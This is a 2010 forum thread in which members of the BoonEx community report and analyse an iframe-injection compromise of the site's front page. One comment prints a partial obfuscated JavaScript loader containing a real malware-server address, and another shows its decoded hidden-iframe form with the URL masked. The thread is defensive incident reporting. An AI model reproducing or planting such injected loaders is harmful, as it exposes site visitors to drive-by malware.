Avast: Trojan Horse Alert @boonex.com

CodeSatori posted 16th of May 2010 in Community Voice. 26 comments.

Avast Antivirus has just alerted me to three instances of Trojan Horse at www.boonex.com front page. This is a javascript/iframe/java based exploit placed somewhere into Boonex.com code or templates.

Someone should investigate this immediately. If it's a false positive, it should be reported to Avast for the next virus definition update. (Update: This is a confirmed iframe/trojan exploit, see comments for detail.) If someone else receives an alert, please look at the logs and report the URLs of the affected pages, along with your virus software brand.

Until this is resolved, suggest turning javascript off in your browser, or otherwise being double sure your virus protection and browser choice are up to standard. The exploit itself depends on a Java applet, so turning Java off at boonex.com is a good idea too.

So far Unity seems to be unaffected, while several other areas cause the alerts below.


Avast Report:

16.5.2010 22:59:44    http://www.boonex.com/ [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:48    http://www.boonex.com/livehelp/include/javascript.php [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:53    http://www.boonex.com/livehelp/locale/en/images/InitateChat.png [L] HTML:IFrame-NO [Trj] (0)

While the last two are reported, the files themselves don't seem to exist. The only infection I can see is the obfuscated javascript at the bottom of the HTML, creating an iframe that links to a malware server.

Screenshots:

Boonex Trojan Iframe

Boonex Trojan Chat

 
Comments
·Oldest
·Top
Please login to post a comment.
CodeSatori
Here is the snippet that seems to be connected with the alert on the front page:

<!-- stardevelop.com Live Help International Copyright - All Rights Reserved //-->
<!-- BEGIN stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
<script language="JavaScript" type="text/JavaScript" src="http://www.boonex.com/livehelp/include/javascript.php"></script>
<!-- END stardevelop.com Live Help see more Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
Nathan Paton
It would appear that this issue occurs when accessing a web site running the LiveZilla online support software. This is most likely an issue with Avast! and not any malicious software.

Since no malware has ever been written for the BeOS, I'm safe from all forms of threats. Ha ha.
CodeSatori
Other areas appear to be affected too. Suggest you refrain from dealing with anything critical here, including your member account settings and any commercial transactions, until this issue is clarified, to avoid possibly compromising your account/assets.
Nathan Paton
It would appear that BoonEx has now removed their installation of LiveZilla from the web server. It is not clear at this time whether or not this was due to the current issue with Avast!.
Nathan Paton
Edit: I don't know why I was thinking this was LiveZilla. All the Dolphin web sites using it must have gotten to me. Scrap everything I said, but this appears to be an issue with Avast!, nevertheless. I should note that BoonEx has indeed removed Live Help from their web server.
CodeSatori
There's a bunch of livehelp code on the front page all the same... This is what I get when I view the generated source:

<!-- stardevelop.com Live Help International Copyright - All Rights Reserved //-->
<!-- BEGIN stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
<div id="floatLayer" align="left" style="position:absolute; left:10px; top:10px; visibility:hidden; z-index:5000;">
<map see more name="LiveHelpInitiateChatMap" id="LiveHelpInitiateChatMap">
<!-- <area shape="rect" coords="50,210,212,223" href="http://livehelp.stardevelop.com" target="_blank" alt="stardevelop.com Live Help"/> -->
<area shape="rect" coords="113,183,197,206" href="#" onclick="openLiveHelp();acceptInitiateChat();return false;" alt="Accept"/>
<area shape="rect" coords="206,183,285,206" href="#" onclick="declineInitiateChat();return false;" alt="Decline"/>

<!--<area shape="rect" coords="263,86,301,104" href="#" onclick="declineInitiateChat();return false;" alt="Close"/>-->
</map>
<div id="InitiateText" align="center" style="position:relative; left:30px; top:145px; width:275px; height:35px; z-index:5001; text-align:center; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold; color: #000000">Do you have any questions that I can help you with?</div>
<img src="http://www.boonex.com/livehelp/locale/en/images/InitateChat.png" alt="BoonEx Live Help" width="323" height="229" border="0" usemap="#LiveHelpInitiateChatMap"/></div>
<!-- END stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->

....

Gets rendered about this far, and then Avast kills the connection.
CodeSatori
Okay, here's what kills it. At the very bottom of the source...

<script language=JavaScript>
var uwdblfsaodg = 'sYLYnyre3csYLYnyre69sYLYnyre66';var welvbvsnxdg = 'sYLYnyre72';var vmxygonhnmd = 'sYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre20sYLYnyre6esYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre3dsYLYnyre22';var poowgoljvco = 'sYLYnyre75sYLYnyre6fsYLYnyre75sYLYnyre6esYLYnyre61sYLYnyre71sYLYnyre70sYLYnyre67sYLYnyre77sYLYnyre68sYLYnyre77';var qxqcqdatksf = 'sYLYnyre22sYLYnyre20sYLYnyre77sYLYnyre69sYLYnyre64sYLYnyre74sYLYnyre68sYLYnyre3dsYLYnyre22sYLYnyre31sYLYnyre22sYLYnyre20sYLYnyre68sYLYnyre65sYLYnyre69sYLYnyre67sYLYnyre68sYLYnyre74sYLYnyre3dsYLYnyre22sYLYnyre30sYLYnyre22';var see more rqmxetkrwbf = 'sYLYnyre20sYLYnyre73sYLYnyre72sYLYnyre63sYLYnyre3dsYLYnyre22';var mymzjwvmlcj = 'sYLYnyre68sYLYnyre74sYLYnyre74sYLYnyre70sYLYnyre3asYLYnyre2fsYLYnyre2f';var sezfetpxyxo = '174.34.135.37/phixnew/index.php';var nvsffkbhqmf = 'sYLYnyre22sYLYnyre20sYLYnyre6dsYLYnyre61sYLYnyre72sYLYnyre67sYLYnyre69sYLYnyre6esYLYnyre77sYLYnyre69sYLYnyre64sYLYnyre74sYLYnyre68sYLYnyre3dsYLYnyre22sYLYnyre31sYLYnyre22sYLYnyre20sYLYnyre6dsYLYnyre61sYLYnyre72sYLYnyre67sYLYnyre69sYLYnyre6esYLYnyre68sYLYnyre65sYLYnyre69sYLYnyre67sYLYnyre68sYLYnyre74sYLYnyre3dsYLYnyre22sYLYnyre30sYLYnyre22sYLYnyre20sYLYnyre74sYLYnyre69sYLYnyre74sYLYnyre6csYLYnyre65sYLYnyre3dsYLYnyre22';var rmpyhbjjllo =

And so on, a good chunk of obfuscated javascript. Looks like it's a hack after all!
CodeSatori
If you want to see the full source HTML of the current front page without triggering alerts, see below:

http://www.codesatori.com/test/boonex_source.php

And here's an archived version where you can look up the javascript after it (hopefully) gets removed:

http://www.codesatori.com/test/boonex_source.html
Nathan Paton
So it would appear. I just check that link at the bottom, but 174.34.135.37 alone leads to 404 error. However, this IP address seems to be linked to malware web sites.
CodeSatori
When you clear up the rudimentary obfuscation, the javascript reads as follows:

<iframe name="uounaqpgwhw" width="1" height="0" src="http://********************" marginwidth="1" marginheight="0" title="uounaqpgwhw" scrolling="no" border="0" frameborder="0"></iframe>

So it's a classic iframe insertion hack there. Now let's patch up those systems!

The URL in the script currently see more returns 404, but there's no saying when it may be on or off, so beware.

For those who didn't get an alert, *this is NOT an Avast issue but an actual exploit attempt*. If you don't get alerts for trojans embedded online, suggest you get software that takes care of it.
Nathan Paton
I agree, this no longer appears to be an issue with Avast!. But for us BeOS users, need we worry about this (he he)?
CodeSatori
Here's a further gloss on where the trail leads: http://www.codesatori.com/test/jsunpack_report.html

You can see that /phixnew/index.php at the above URL contains some sort of Java applet based exploit, while another URL under the same path is an ActiveX based trojan.

And BeOS is like a cabin in the woods.... No crime to worry about, but then again not much else either. It's very safe however! =)
houstonlively
I would like to propose a theory that Boonex is fully aware of this, and that it is part of their evil plan to control all of us.
Nathan Paton
@houstonlively: Actually, it's just AlexT. Andrew and co. are unaware of what true evil lurks behind the doors of the house on 509 Drury Lane.
AlexT
Virus was removed from boonex site, now we are investigating this issue.
AlexT
@houstonlively
we have a different plan .. to not allow anyone to control you :)
Nathan Paton
@AlexT: That's good to hear. Both the malware and your plan, that is.
Good job there and a simple thanks would do for alerting this issue, spending time off from W dev to confirm it and helping out :P
CodeSatori
I did get thanks over e-mail from Julia and Alex when I reported this in.

I like to think this was an automated exploit, but given that it rolled in on Sunday (which is when staff is rarely around here), and given that this site runs on proprietary software, it may also be a targeted exploit attempt.
Nathan Paton
@CodeSatori: I envy you. What do I need to do to get an email from AlexT?
cbassthefish
@magnussoft: I would prefer one from Julia :P
pierrehs
I had the same virus with firefox and avast
CodeSatori
The e-mails were of course in response to my e-mail to them (all relevant Boonex addresses) to cut down the lag it takes for someone to figure out there's an urgent issue ongoing.
mychillspot
wow i got this too i wasnt sure if it was boonex or another site i was on.
DosDawg
good find codesatori and good reporting. you too magnussoft.

AlexT, good job in getting it removed. So was there a patch you had to implment, and if so which i would think there was, when are you going to release that patch so that the thousands of sites that are running this platform can utilize that security patch?

Regards,
DosDawg
CodeSatori
@DosDawg: The only thing to do in fixing this this was removing the exploit Javascript from the bottom of the page. The real question is, how did it get there? I haven't heard any reports on that as of yet.

My educated guess is that either 1) someone was able to modify Boonex.com templates due to a public vulnerability in a template/templating file (which is the better case), or 2) someone gained administrator level access to the site and did it (which is the worse case). In either case, it would see more be good to have a report on the investigation of what caused this.

If full server access was compromised, there's no telling what all was done, and what data was snatched from users and the database in general. In such case, the entire filesystem and database should also be combed through to ensure no possible backdoors have been left in.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.11812496185303